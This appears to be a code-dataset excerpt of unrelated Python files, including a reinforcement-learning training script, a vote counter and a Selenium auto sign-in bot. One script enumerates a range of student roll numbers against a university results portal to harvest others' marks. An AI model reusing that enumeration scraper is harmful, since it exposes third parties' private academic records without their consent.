handler = logging.StreamHandler(sys.stdout)\n handler.setLevel(logging.INFO)\n handler.setFormatter(formatter)\n logger.addHandler(handler)\n\n current_time = datetime.datetime.now().strftime(\"%b%d_%H-%M-%S\")\n logdir = os.path.join(\"runs\", current_time)\n\n os.makedirs(logdir, exist_ok=True)\n filename = os.path.join(logdir, \"run.log\")\n handler = logging.FileHandler(filename)\n handler.setLevel(logging.INFO)\n handler.setFormatter(formatter)\n logger.addHandler(handler)\n return logger, logdir\n\n\nlogger = logging.getLogger()\nlogdir = set_logger(logger)\n\nlogger.info(\"Running RCRC VAE PPO\")\n\n\nimport argparse\n\nimport numpy as np\n\nimport gym\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nfrom torch.distributions import Beta\nfrom torch.utils.data.sampler import BatchSampler, SubsetRandomSampler\n#from environment import make_single_env\nfrom torch.utils.tensorboard import SummaryWriter\nfrom cv2 import resize as rsz\nfrom utils.misc import ASIZE, LSIZE, RSIZE, RED_SIZE, SIZE, transform\nfrom models import VAE\n\n\nparser = argparse.ArgumentParser(description='Train a PPO agent for the CarRacing-v0')\nparser.add_argument('--gamma', type=float, default=0.99, metavar='G', help='discount factor (default: 0.99)')\nparser.add_argument('--action-repeat', type=int, default=8, metavar='N', help='repeat action in N frames (default: 8)')\nparser.add_argument('--img-stack', type=int, default=3, metavar='N', help='stack N image in a state (default: 4)')\nparser.add_argument('--seed', type=int, default=np.random.randint(np.int32(2**31-1)), metavar='N', help='random seed (default: 0)')\nparser.add_argument('--render', action='store_true', help='render the environment')\nparser.add_argument('--tb', action='store_true', help='use tb')\nparser.add_argument(\n '--log-interval', type=int, default=10, metavar='N', help='interval between training status logs (default: 10)')\nargs = parser.parse_args()\n\nuse_cuda = torch.cuda.is_available()\ndevice = torch.device(\"cuda\" if use_cuda else \"cpu\")\ntorch.manual_seed(args.seed)\nif use_cuda:\n torch.cuda.manual_seed(args.seed)\n\ntransition = np.dtype([('s', np.float64, (1537,)), ('a', np.float64, (3,)), ('a_logp', np.float64),\n ('r', np.float64), ('s_', np.float64, (1537,))])\n\n\n\n\n \n\nclass Env(gym.Wrapper):\n \"\"\"\n Environment wrapper for CarRacing \n \"\"\"\n\n def __init__(self, env, resize=False, img_stack=3, action_repeat=8):\n super(Env, self).__init__(env)\n self.env = env\n #self.env.seed(args.seed)\n self.reward_threshold = self.env.spec.reward_threshold\n self.resize = resize\n self.img_stack = img_stack\n self.action_repeat = action_repeat\n\n def reset(self):\n self.counter = 0\n self.av_r = self.reward_memory()\n\n self.die = False\n img_rgb = self.env.reset()\n img_gray = self.rgb2gray(img_rgb)\n if self.resize:\n img_gray = rsz(img_gray, (64,64))\n self.stack = [img_gray] * self.img_stack # four frames for decision\n out_img_stack = np.array(self.stack).astype(np.float64) \n #out_img_stack = np.interp(out_img_stack, (out_img_stack.min(), out_img_stack.max()), (0, 255))\n out_img_stack = (out_img_stack / out_img_stack.max()) * 255 \n out_img_stack = out_img_stack.astype(np.uint8).transpose(1,2,0)\n return out_img_stack\n\n def step(self, action):\n \n total_reward = 0\n for i in range(self.action_repeat):\n img_rgb, reward, die, _ = self.env.step(action)\n # don't penalize \"die state\"\n if die:\n reward += 100\n # green penalty\n if np.mean(img_rgb[:, :, 1]) > 185.0:\n reward -= 0.05\n total_reward += reward\n # if no reward recently, end the episode\n done = True if self.av_r(reward) <= -0.1 else False\n if done or die:\n break\n img_gray = self.rgb2gray(img_rgb)\n if self.resize:\n img_gray = rsz(img_gray, (64,64))\n self.stack.pop(0)\n self.stack.append(img_gray)\n assert len(self.stack) == self.img_stack\n if done or die:\n done = True\n out_img_stack = np.array(self.stack).astype(np.float64) \n #out_img_stack = np.interp(out_img_stack, (out_img_stack.min(), out_img_stack.max()), (0, 255))\n out_img_stack = (out_img_stack / out_img_stack.max()) * 255 \n out_img_stack = out_img_stack.astype(np.uint8).transpose(1,2,0)\n \n return out_img_stack, total_reward, done, die\n\n def render(self, *arg):\n self.env.render(*arg)\n\n @staticmethod\n def rgb2gray(rgb, norm=True):\n # rgb image -> gray [0, 1]\n gray = np.dot(rgb[..., :], [0.299, 0.587, 0.114])\n if norm:\n # normalize\n gray = gray / 128. - 1.\n return gray\n\n @staticmethod\n def reward_memory():\n # record reward for last 100 steps\n count = 0\n length = 100\n history = np.zeros(length)\n\n def memory(reward):\n nonlocal count\n history[count] = reward\n count = (count + 1) % length\n return np.mean(history)\n\n return memory\n\n \n\n\ndef init_W(n, m):\n weight = torch.normal(mean=torch.zeros((n, m)), std=torch.ones((n, m)))\n\n N = n * m\n p = int(0.2 * N)\n\n u, s, v = torch.svd(weight, compute_uv=True)\n s_ = 0.95 * s / s.max()\n\n weight = u * s_ * v.t()\n indices = np.random.choice(N, p)\n for i in indices:\n a = i // n\n b = i - a * n\n weight[a, b] = 0\n return weight\n\n\nclass FixedRandomModel(nn.Module):\n def __init__(self, alpha):\n super().__init__()\n #self.conv = Conv()\n vae_file = join(\"./vae\", 'best.tar') \n\n assert exists(vae_file) , \"vae is untrained.\"\n\n vae_state = torch.load(vae_file, map_location={'cuda:0': str(device)})\n\n logger.info(\"Loading VAE at epoch {} with test loss {}\".format(vae_state['epoch'], vae_state['precision']))\n\n self.vae = VAE(3, LSIZE).to(device).double()\n self.vae.load_state_dict(vae_state['state_dict'])\n \n self.W_in = nn.Linear(2*2*256, 512, bias=False)\n self.W = nn.Linear(512, 512, bias=False)\n self.W.weight.data = init_W(512, 512)\n self.x_esn = None\n self.alpha = alpha\n\n def forward(self, obs):\n B = obs.shape[0]\n _, _, _, x_conv = self.vae(obs)\n x_conv_flat = x_conv.view(B, -1)\n\n if self.x_esn is None or self.x_esn.shape[0] != B:\n x_esn = torch.tanh(self.W_in(x_conv_flat))\n else:\n x_hat = torch.tanh(self.W_in(x_conv_flat) + self.W(self.x_esn))\n x_esn = (1 - self.alpha) * self.x_esn + self.alpha * x_hat\n self.x_esn = x_esn\n return (x_conv_flat, x_esn)\n\n\nclass WM(nn.Module):\n def __init__(self, model):\n super(WM, self).__init__()\n self.model = model\n \n \n def forward(self, obs):\n x_conv, x_esn = self.model(obs)\n B = obs.shape[0]\n S = torch.cat((x_conv, x_esn, torch.ones((B, 1)).double().to(device) ), dim=1)\n\n return S\n \n \nclass ACC(nn.Module):\n \"\"\"\n Actor-Critic Network for PPO\n \"\"\"\n\n def __init__(self, wm_model):\n super(ACC, self).__init__()\n self.wm_model = wm_model\n for p in self.wm_model.parameters():\n p.requires_grad = False\n self.v = nn.Sequential(nn.Linear(1537, 256), nn.ReLU(), nn.Linear(256, 1))\n self.fc = nn.Sequential(nn.Linear(1537, 256), nn.ReLU())\n self.alpha_head = nn.Sequential(nn.Linear(256, 3), nn.Softplus())\n self.beta_head = nn.Sequential(nn.Linear(256, 3), nn.Softplus())\n\n\n def forward(self, x, actual_obs=True):\n if actual_obs:\n x = self.wm_model(x)\n \n rcrc_s = x.view(-1, 1537)\n v = self.v(rcrc_s)\n p = self.fc(rcrc_s)\n alpha = self.alpha_head(p) + 1\n beta = self.beta_head(p) + 1\n\n return (alpha, beta), v, rcrc_s\n\n\nclass Agent():\n \"\"\"\n Agent for training\n \"\"\"\n max_grad_norm = 0.5\n clip_param = 0.1 # epsilon in clipped loss\n ppo_epoch = 10\n buffer_capacity, batch_size = 1750, 128\n\n def __init__(self):\n self.training_step = 0\n self.fixed_model = FixedRandomModel(0.5).double().to(device)\n self.wm_model = WM(self.fixed_model).double().to(device)\n self.net = ACC(self.wm_model).double().to(device)\n if os.path.exists(\"param/ppo_net_params.pkl\"):\n self.load_param()\n logger.info(\"Model Loaded Successfully\")\n self.buffer = np.empty(self.buffer_capacity, dtype=transition)\n self.counter = 0\n\n self.optimizer = optim.Adam(self.net.parameters(), lr=1e-3)\n\n def select_action(self, state):\n #state = torch.from_numpy(state).double().to(device).unsqueeze(0)\n with torch.no_grad():\n (alpha, beta), _, rcrc_s = self.net(state)\n dist = Beta(alpha, beta)\n action = dist.sample()\n a_logp = dist.log_prob(action).sum(dim=1)\n\n action = action.squeeze().cpu().numpy()\n a_logp = a_logp.item()\n return action, a_logp, rcrc_s\n\n def save_param(self):\n torch.save(self.net.state_dict(), 'param/ppo_net_params.pkl')\n\n def store(self, transition):\n self.buffer[self.counter] = transition\n self.counter += 1\n if self.counter == self.buffer_capacity:\n self.counter = 0\n return True\n else:\n return False\n def load_param(self):\n self.net.load_state_dict(torch.load('param/ppo_net_params.pkl'))\n\n def update(self):\n self.training_step += 1\n\n s = torch.tensor(self.buffer['s'], dtype=torch.double).to(device)\n a = torch.tensor(self.buffer['a'], dtype=torch.double).to(device)\n r = torch.tensor(self.buffer['r'], dtype=torch.double).to(device).view(-1, 1)\n s_ = torch.tensor(self.buffer['s_'], dtype=torch.double).to(device)\n old_a_logp = torch.tensor(self.buffer['a_logp'], dtype=torch.double).to(device).view(-1, 1)\n\n with torch.no_grad():\n target_v = r + args.gamma * self.net(s_, actual_obs=False)[1]\n adv = target_v - self.net(s, actual_obs=False)[1]\n # adv = (adv - adv.mean()) / (adv.std() + 1e-8)\n\n for _ in range(self.ppo_epoch):\n for index in BatchSampler(SubsetRandomSampler(range(self.buffer_capacity)), self.batch_size, False):\n\n alpha, beta = self.net(s[index], actual_obs=False)[0]\n dist = Beta(alpha, beta)\n a_logp = dist.log_prob(a[index]).sum(dim=1, keepdim=True)\n ratio = torch.exp(a_logp - old_a_logp[index])\n\n surr1 = ratio * adv[index]\n surr2 = torch.clamp(ratio, 1.0 - self.clip_param, 1.0 + self.clip_param) * adv[index]\n action_loss = -torch.min(surr1, surr2).mean()\n value_loss = F.smooth_l1_loss(self.net(s[index], actual_obs=False)[1], target_v[index])\n loss = action_loss + 2. * value_loss\n\n self.optimizer.zero_grad()\n loss.backward()\n # nn.utils.clip_grad_norm_(self.net.parameters(), self.max_grad_norm)\n self.optimizer.step()\n\n\nif __name__ == \"__main__\":\n agent = Agent()\n env = gym.make(\"CarRacing-v0\")\n env = Env(env)\n parameters = sum(p.numel() for p in agent.net.parameters())\n train_parameters = sum(p.numel() for p in agent.net.parameters() if p.requires_grad)\n logger.info(\"Total Parameters : %s \" % parameters)\n logger.info(\"Trainable Params : %s\" % train_parameters)\n logger.info(agent.net)\n \n if args.tb:\n writer = SummaryWriter(log_dir=\"./tb/\")\n\n training_records = []\n running_score = 0\n state = env.reset()\n max_score = -1e4\n for i_ep in range(100000):\n score = 0\n state = env.reset()\n state = transform(state).unsqueeze(0).to(device).double()\n agent.net.wm_model.model.x_esn = None\n \n action, a_logp, rcrc_s = agent.select_action(state)\n for t in range(1000):\n state, reward, done, die = env.step(action * np.array([2., 1., 1.]) + np.array([-1., 0., 0.]))\n state = transform(state).unsqueeze(0).to(device).double()\n next_action, next_a_logp, rcrc_s_ = agent.select_action(state)\n if args.render:\n env.render()\n if agent.store((rcrc_s.cpu().numpy(), action, a_logp, reward, rcrc_s_.cpu().numpy())):\n logger.info('updating')\n agent.update()\n score += reward\n rcrc_s = rcrc_s_\n action = next_action\n a_logp = next_a_logp\n if done:\n break\n running_score = running_score * 0.99 + score * 0.01\n \n if i_ep % args.log_interval == 0:\n if args.tb:\n writer.add_scalar(\n \"running_score\", running_score, global_step=i_ep\n )\n writer.add_scalar(\n \"last_score\", score, global_step=i_ep\n )\n logger.info('Ep {}\\tLast score: {:.2f}\\tMoving average score: {:.2f}'.format(i_ep, score, running_score))\n if running_score > max_score:\n max_score = running_score\n agent.save_param()\n logger.info(\"Saving a new model, max score is {}\".format(max_score))\n \n if running_score > env.reward_threshold:\n logger.info(\"Solved! Running reward is now {} and the last episode runs to {}!\".format(running_score, score))\n break\n","sub_path":"vrc/vrc_train.py","file_name":"vrc_train.py","file_ext":"py","file_size_in_byte":14060,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"525850481","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# @Author: r4j\n# @Date: 2020-04-14 17:47:24\n# @Last Modified by: r4j\n# @Last Modified time: 2020-04-14 17:50:52\n\nimport re\nimport sys\nimport argparse\nimport requests\nimport concurrent.futures\n\n\nsubjects = [\n 'CLK3V',\n 'CLZ3P',\n 'SAE31',\n 'SAE3A',\n 'SBAOC',\n 'TSSEG',\n 'CLE3H',\n 'CLA3M']\n\nresult_url = 'https://egovernance.unom.ac.in/resultnocap/'\narrear_url = result_url\nreval_url = 'https://egovernance.unom.ac.in/RVNOV2019/'\n\nroll_number = [roll for roll in range(221810449, 221810499)]\n\n\ndef status(url):\n if requests.get(url).status_code == 200:\n return True\n\n\ndef calc_arrears(roll):\n roll_no = roll\n\n data = {\n '__LASTFOCUS': '',\n '__VIEWSTATE': '/wEPDwULLTExNDk4NTI2NzcPZBYCAgMPZBYUAg0PD2QWAh4Hb25jbGljawURcmV0dXJuIHZhbGlkYXRlKClkAg8PDxYCHgdWaXNpYmxlaGRkAhMPDxYCHwFoZGQCFQ88KwAKAGQCFw88KwARAwAPZBYCHgtib3JkZXJjb2xvcgUHI0Y0RjRGNAEQFgAWABYADBQrAABkAhkPDxYCHwFoZGQCGw8PFgIfAWhkZAIdDw8WAh8BaGRkAh8PDxYCHwFoZGQCIQ8PFgIfAWhkZBgCBQlHcmlkVmlldzEPZ2QFCUZvcm1WaWV3MQ9nZLaGGV84hEKN39bx3qJj+4a+uqf4R6P0rR8C8lOVSVpq',\n '__VIEWSTATEGENERATOR': 'A980467A',\n '__EVENTTARGET': '',\n '__EVENTARGUMENT': '',\n '__EVENTVALIDATION': '/wEdAAMM1iTKfqRaR+qYZptN5JwpESCFkFW/RuhzY1oLb/NUVM34O/GfAV4V4n0wgFZHr3fON8hWKDQq3TURb4VWk91Q+JSmQ8P4fnfGKZMawLVg9Q==',\n 'TextBox1': roll_no,\n 'Button1': 'Get Marks'\n }\n\n response = requests.post(\n arrear_url, data=data)\n re_status = re.findall(\n r'RA|A|F|P', response.text)\n\n re_sub = re.findall(r'\\w{5}', response.text)\n re_sub = re_sub[2:]\n re_sub = re.findall(r'\\w{5}', ''.join(re_sub))\n\n string = \"\"\n for i in range(len(re_status)):\n if \"A\" in re_status[i]:\n string += re_sub[i] + \",\"\n\n if string == \"\":\n print(\"{} ===> None\".format(roll_no))\n else:\n print(\"{} ===> {}\".format(roll_no, string))\n\n\ndef calc_result(roll):\n s = requests.Session()\n\n roll_no = roll\n data = {\n '__LASTFOCUS': '',\n '__VIEWSTATE': '/wEPDwULLTExNDk4NTI2NzcPZBYCAgMPZBYUAg0PD2QWAh4Hb25jbGljawURcmV0dXJuIHZhbGlkYXRlKClkAg8PDxYCHgdWaXNpYmxlaGRkAhMPDxYCHwFoZGQCFQ88KwAKAGQCFw88KwARAwAPZBYCHgtib3JkZXJjb2xvcgUHI0Y0RjRGNAEQFgAWABYADBQrAABkAhkPDxYCHwFoZGQCGw8PFgIfAWhkZAIdDw8WAh8BaGRkAh8PDxYCHwFoZGQCIQ8PFgIfAWhkZBgCBQlHcmlkVmlldzEPZ2QFCUZvcm1WaWV3MQ9nZLaGGV84hEKN39bx3qJj+4a+uqf4R6P0rR8C8lOVSVpq',\n '__VIEWSTATEGENERATOR': 'A980467A',\n '__EVENTTARGET': '',\n '__EVENTARGUMENT': '',\n '__EVENTVALIDATION': '/wEdAAMM1iTKfqRaR+qYZptN5JwpESCFkFW/RuhzY1oLb/NUVM34O/GfAV4V4n0wgFZHr3fON8hWKDQq3TURb4VWk91Q+JSmQ8P4fnfGKZMawLVg9Q==',\n 'TextBox1': roll_no,\n 'Button1': 'Get Marks'\n }\n\n response = s.post(result_url, data=data)\n\n re_marks = re.findall(r'\\d{3}|AAA', response.text)\n\n re_sub = re.findall(r'\\w{5}', response.text)\n\n parse_marks = []\n for m in range(2, len(re_marks), 3):\n if \"AAA\" in re_marks[m]:\n parse_marks.append(0)\n else:\n parse_marks.append(\n int(\"\".join(re.findall(r'\\d\\d\\d', re_marks[m])).lstrip('0')))\n\n parse_code = [\n \"\".join(\n re.findall(\n r'\\w{5}',\n re_sub[s])) for s in range(\n 2,\n len(re_sub))]\n\n result = {parse_code[i]: parse_marks[i] for i in range(len(parse_code))}\n\n total = 0\n\n for sub_code in subjects:\n if sub_code in result:\n total += result[sub_code]\n results[roll_no] = total\n\n\ndef calc_reval(roll):\n s = requests.Session()\n\n roll_no = roll\n\n data = {\n '__LASTFOCUS': '',\n '__VIEWSTATE': '/wEPDwUJODEwOTUzODMyD2QWAgIDD2QWDgINDw9kFgIeB29uY2xpY2sFEXJldHVybiB2YWxpZGF0ZSgpZAIPDw8WAh4HVmlzaWJsZWhkZAIRDw8WAh8BaGRkAhMPDxYCHwFoZGQCFQ88KwAKAGQCFw88KwARAwAPZBYCHgtib3JkZXJjb2xvcgUHI0Y0RjRGNAEQFgAWABYADBQrAABkAhkPDxYCHwFoZGQYAgUJR3JpZFZpZXcxD2dkBQlGb3JtVmlldzEPZ2Tfdvhl7BTyehkS/2IirXre+dWXHUGudvANtU82yKxvDA==',\n '__VIEWSTATEGENERATOR': 'B2629E41',\n '__EVENTTARGET': '',\n '__EVENTARGUMENT': '',\n '__EVENTVALIDATION': '/wEdAAM4BwhzC3yKHH4siEx+iEyuESCFkFW/RuhzY1oLb/NUVM34O/GfAV4V4n0wgFZHr3fxiLwv6L5Ozd5PGfKmBeoNzVXf1WPreDieg8Rngi/JHQ==',\n 'TextBox1': roll_no,\n 'Button1': 'Get Marks'\n }\n\n response = s.post(reval_url, data=data)\n\n re_marks = re.findall(r'>\\d\\d\\d\\w{5} {}\".format(roll_no, result))\n\n\ndef Main():\n parser = argparse.ArgumentParser()\n parser.add_argument(\n \"-r\", \"--result\", help=\"Get the result\", action=\"store_true\")\n parser.add_argument(\n \"-a\", \"--arrear\", help=\"Get the arrear result\", action=\"store_true\")\n parser.add_argument(\n \"-re\", \"--reval\", help=\"Get the reval result\", action=\"store_true\")\n parser.add_argument(\n \"-o\", \"--out\", help=\"store the output to a file\", action=\"store_true\")\n\n args = parser.parse_args()\n\n if args.reval:\n if status(reval_url):\n\n print(\"========== Revaluation ==========\")\n with concurrent.futures.ThreadPoolExecutor() as executor:\n executor.map(calc_reval, roll_number)\n\n print(\"========== End ==========\")\n\n else:\n print(\"Invalid url \")\n\n if args.arrear:\n if status(arrear_url):\n\n print(\"========== Arrears ==========\")\n\n with concurrent.futures.ProcessPoolExecutor() as executor:\n executor.map(calc_arrears, roll_number)\n\n print(\"========== End ==========\")\n\n else:\n print(\"Invalid url \")\n\n if args.result:\n if status(result_url):\n print(\"========== Results ==========\")\n\n with concurrent.futures.ThreadPoolExecutor() as executor:\n executor.map(calc_result, roll_number)\n\n for key, value in sorted(results.items()):\n\n print(\"{} ===> {} ===> {}\".format(key, value, value / 6))\n\n print(\"========== End ==========\")\n else:\n print(\"Invalid url \")\n\n\nif __name__ == \"__main__\":\n\tif len(sys.argv) < 2:\n\t\tprint(f\"Run python3 {sys.argv[0]} --help\")\n\telse:\n\t results = {}\n\t Main()\n# Todo output func ","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6859,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"99295161","text":"f=open('domainMesh_20000_Converted_Mask.msh','r')\n\nlines=[]\nfor i in f:\n lines.append(i)\nf.close()\n\nline=0\nwhile lines[line]!='\"Condutivity\"\\n':\n line+=1\nline+=7\n\nresultsFile=open('NN_prediction.txt','r')\nfor i in range(line,len(lines)-1):\n lines[i] = lines[i].split('\\t')[0]+'\\t'+resultsFile.readline()\nresultsFile.close()\n\nf=open('domainMesh_20000_Converted_Mask.msh','w')\nfor l in lines:\n f.write(l)\nf.close()\n\nprint(\"-\")\n","sub_path":"substituteMshMask.py","file_name":"substituteMshMask.py","file_ext":"py","file_size_in_byte":437,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"525150818","text":" #PyPoll Analysis\n#-------------------------------\n\n#Step 1: Import the modules I'll need\nimport os\nimport csv\n\n#Step 2: Identify the budget_data.csv file we'll use for PyPoll\npollcsv = os.path.join(\"Resources\",\"election_data.csv\")\n\ntotalvotes = 0\ncandidates = {}\npercentages = {}\nvotes= {}\ntotalcandidatevotes = 0\n\nwith open(pollcsv, newline=\"\") as csvfile:\n electionreader = csv.reader(csvfile, delimiter=\",\")\n election_reader = next(electionreader)\n \n for row in electionreader:\n #Step 3: Collect number of total votes\n totalvotes = totalvotes + 1\n\n #Step 4: Identify where candidate data is located\n candidate = row[2]\n\n #Step 5: Identify how many votes each candidate received\n if candidate not in candidates.keys():\n candidates[candidate] = [row[0]]\n \n else:\n candidates[candidate].append(row[0])\n\n #Step 6: Identify what percentage of votes the candidates received\n for candidatename in candidates.keys():\n votes[candidatename] = len(candidates[candidatename])\n percentages[candidatename] = len(candidates[candidatename])/totalvotes * 100\n\n#Step 7: Print election results\nprint(f'Election Results')\nprint(\"-------------------\")\nprint(f'Total Votes: {totalvotes}')\nprint(\"-------------------\")\nfor candidatename in candidates.keys():\n print(f'{candidatename} {len(candidates[candidatename])} ({round(percentages[candidatename],3)}%)')\n\nfor candidatename in candidates.keys(): \n if len(candidates[candidate]) > totalcandidatevotes:\n totalcandidatevotes = len(candidates[candidate])\n winner = candidatename\nprint(\"-------------------\")\nprint(f'Winner: {winner}')\nprint(\"-------------------\")\n\n#Step 8: Your final script should both print the analysis to the terminal and export a text file with the results.\noutputpath = os.path.join(\"output\",\"PyPollAnalysis.txt\")\noutputfile = open(outputpath, \"w\")\n\n#Writing out the text\noutputfile.writelines(f'Election Results')\noutputfile.writelines(\"\\n-------------------\")\noutputfile.writelines(f'\\nTotal Votes: {totalvotes}')\noutputfile.writelines(\"\\n-------------------\")\nfor candidatename in candidates.keys():\n outputfile.writelines(f'\\n{candidatename} {len(candidates[candidatename])} ({round(percentages[candidatename],3)}%)')\noutputfile.writelines(\"\\n-------------------\")\noutputfile.writelines(f'\\nWinner: {winner}')\noutputfile.writelines(\"\\n-------------------\")","sub_path":"PyPoll/test data/main_CM_test_12-13-19.py","file_name":"main_CM_test_12-13-19.py","file_ext":"py","file_size_in_byte":2455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"155717832","text":"import time\nimport picamera\n\nwith picamera.PiCamera() as camera:\n\tfor x in range (0,3):\n\t\tcamera.resolution = (1024, 768)\n\t\tcamera.start_preview()\n\t\ttime.sleep(.5)\n\t\tcamera.capture('test' + str(x) + '.jpg')\n\tcamera.stop_preview()\n\tcamera.close()\n","sub_path":"dsurve.py","file_name":"dsurve.py","file_ext":"py","file_size_in_byte":246,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"565560200","text":"#Nombre: Alejandro Cadena\r\n#Correo: Dobleaduo@gmail.com\r\n#Mostrar si se aprueba la materia o no\r\nnombre=input(\"Ingrese nombre del estudiante: \")\r\nclases=int(input(\"Ingrese el total de numnero de clases del semestre: \"))\r\nausencias=int(input(\"Ingrese el numero de fallas a clase: \"))\r\nnotadefinitiva=float(input(\"Ingrese la nota definitiva del curso: \"))\r\nperdidaporfallas=clases*0.2\r\nif ausencias>perdidaporfallas:\r\n print(\"Ud perdio por fallas y su nota es de 0\")\r\nelse:\r\n print(\"felicidades aprobo el curso: \",notadefinitiva)","sub_path":"algoritmo15.py","file_name":"algoritmo15.py","file_ext":"py","file_size_in_byte":533,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"219985186","text":"import time, os\nfrom selenium import webdriver\nfrom selenium.webdriver.support.wait import WebDriverWait\nimport configparser\n#http://my.4399.com/forums/mtag-78097\n#http://my.4399.com/jifen/\n\ndef main(is_head):\n #设置请求头\n headers=(\"User-Agent\",\"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0\")\n \n config = configparser.ConfigParser() # 类实例化\n path_default_sys = r'.\\path\\path_sys.ini'\n path_default_chrome = r'.\\Google\\Chrome\\Application\\chromedriver.exe'\n config.read(path_default_sys)\n path = config['path']['path_ini']\n config.read(path)\n \n #打开一个Chrome浏览器\n if is_head:\n #浏览器显示\n driver = webdriver.Chrome(config['path']['path_chrome']) #还可以指定路径\n else:\n #无头模式\n chrome_path = config['path']['path_chrome']\n option=webdriver.ChromeOptions()\n option.add_argument('headless') # 设置option\n driver = webdriver.Chrome(executable_path=chrome_path, chrome_options=option)\n \n # 请求网站\n url1 = 'http://my.4399.com/forums/mtag-78097'\n url2 = 'http://my.4399.com/jifen/'\n driver.get(url1)\n driver.switch_to_frame('popup_login_frame')#先跳转到iframe框架\n\n all_infor = []\n is_success = False\n is_success1 = False\n is_success2 = False\n try:\n #登录\n try:\n driver.find_element_by_xpath(\"//div[@class = 'sign_group']/a\").click()#签到\n except:\n #未登录时\n WebDriverWait(driver, 2, 0.1).until(lambda x: x.find_element_by_name('username')).send_keys(config['path_4399']['username'])\n #username = driver.find_element_by_name('username').send_keys(config['path_4399']['username'])\n driver.find_element_by_id('j-password').send_keys(config['path_4399']['password'])\n \n #登录\n driver.find_element_by_xpath(\"//div[@class = 'login_hor ux_login clearfix']/input\").click()\n try:\n #密码错误\n infor = WebDriverWait(driver, 1, 0.1).until(lambda x: x.find_element_by_xpath(\"//div[@id = 'Msg']\")).text\n pwd = False\n except:\n pwd = True\n pass\n if not pwd:\n raise\n driver.switch_to.default_content()\n\n #url1签到\n try:\n try:\n infor = driver.find_element_by_xpath(\"//div[@class = 'sign_group sign_disabled']/a\").text\n infor = \"您已签到!\"\n except:\n element = WebDriverWait(driver, 2, 0.1).until(lambda x: x.find_element_by_xpath(\"//div[@class = 'sign_group']/a\"))\n driver.execute_script(\"arguments[0].click();\", element)\n infor = WebDriverWait(driver, 1, 0.1).until(lambda x: x.find_element_by_xpath(\"//div[@class = 'sign_group sign_disabled']/a\")).text\n infor += \"!\"\n is_success1 = True\n all_infor += [url1, infor]\n except:\n #若url1签到失败不影响url2签到\n infor = \"签到失败!\"\n\n all_infor += [url1, infor]\n \n #url2签到\n driver.get(url2)\n try:\n infor = WebDriverWait(driver, 2, 0.1).until(lambda x: x.find_element_by_xpath(\"//div[@class = 'jf_checkin_box']/a/span\"))\n if infor.text == \"我要签到\":\n infor.click()\n time.sleep(1.5)\n infor = \"成功签到!\"\n is_success2 = True\n elif infor.text == \"查看签到记录\":\n infor = \"您已签到!\"\n is_success2 = True\n else:\n infor = \"签到失败!\"\n\n all_infor += [url2, infor]\n except:\n infor = \"签到失败!\"\n all_infor += [url2, infor]\n \n except:\n if not pwd: all_infor += [url1, infor]\n else: all_infor += [\"程序出错\"]\n \n if is_success1 and is_success2: is_success = True\n driver.close()\n try: os.system('taskkill /im chromedriver.exe /F')\n except: pass\n all_infor += ['\\n']\n return all_infor, is_success\n\nif __name__ == \"__main__\":\n print(main(1))","sub_path":"V4.3/sgsqd.py","file_name":"sgsqd.py","file_ext":"py","file_size_in_byte":4247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"636785425","text":"def debug():\n print(f'path_to_folder_expts = {path_to_folder_expts}')\n print(f'net_filename = {net_filename}')\n print(f'seed = {seed}')\n print(f'matlab_filename = {matlab_filename}')\n ''' '''\n use_cuda = torch.cuda.is_available()\n device = torch.device(\"cuda\" if use_cuda else \"cpu\")\n ''' '''\n data_set = 'mnist'\n data_eval_type = 'evalaute_mdl_on_full_data_set'\n evalaute_mdl_data_set = get_function_evaluation_from_name(data_eval_type)\n ''' data '''\n data_path = './data'\n print(f'data_set = {data_set}')\n trainset, testset, classes = data_class.get_data_processors(data_path, 0.0, dataset_type=data_set, standardize=True)\n trainloader = torch.utils.data.DataLoader(trainset, batch_size=1024, shuffle=True, num_workers=10)\n testloader = torch.utils.data.DataLoader(testset, batch_size=1024, shuffle=False, num_workers=10)\n trainloader = self.trainloader\n testloader = self.testloader\n ''' Criterion '''\n error_criterion = metrics.error_criterion\n criterion = torch.nn.CrossEntropyLoss()\n iterations = math.inf\n ''' Nets'''\n net_path = os.path.join(path_to_folder_expts, net_filename)\n net = utils.restore_entire_mdl(net_path).cuda()\n # net2 = utils.restore_entire_mdl(path).cuda()\n # net3 = utils.restore_entire_mdl(path).cuda()\n ''' stats about the nets '''\n train_loss_epoch, train_error_epoch = evalaute_mdl_data_set(criterion, error_criterion, net, trainloader, device)\n test_loss_epoch, test_error_epoch = evalaute_mdl_data_set(criterion, error_criterion, net, testloader, device)\n nb_params = nn_mdls.count_nb_params(net)\n ''' print net stats '''\n print(\n f'train_loss_norm, train_error_norm, test_loss_norm, test_error_norm = {train_loss_norm, train_error_norm, test_loss_norm, test_error_norm}')\n print(\n f'train_loss_un, train_error_un, test_loss_un, test_error_un = {train_loss_un, train_error_un, test_loss_un, test_error_un}')\n print(f'train_loss_epoch, train_error_epoch = {train_loss_epoch}, {train_error_epoch}')\n print(f'test_loss_epoch, test_error_epoch = {test_loss_epoch}, {test_error_epoch}')\n print(f'nb_params {nb_params}')","sub_path":"pytorch_experiments/debug.py","file_name":"debug.py","file_ext":"py","file_size_in_byte":2177,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"530978868","text":"\"\"\"\r\nWeek 7 - Activity: Aggregation\r\n---------\r\nAUTHOR: Edward Camp\r\n\"\"\"\r\n\r\nfrom Week7.Dog import Dog\r\nfrom Week7.Cat import Cat\r\nfrom Week7.Collar import Collar\r\n\r\n'''\r\nFor our classes so far, their variables consist of either strings or numbers. However, it is possible for 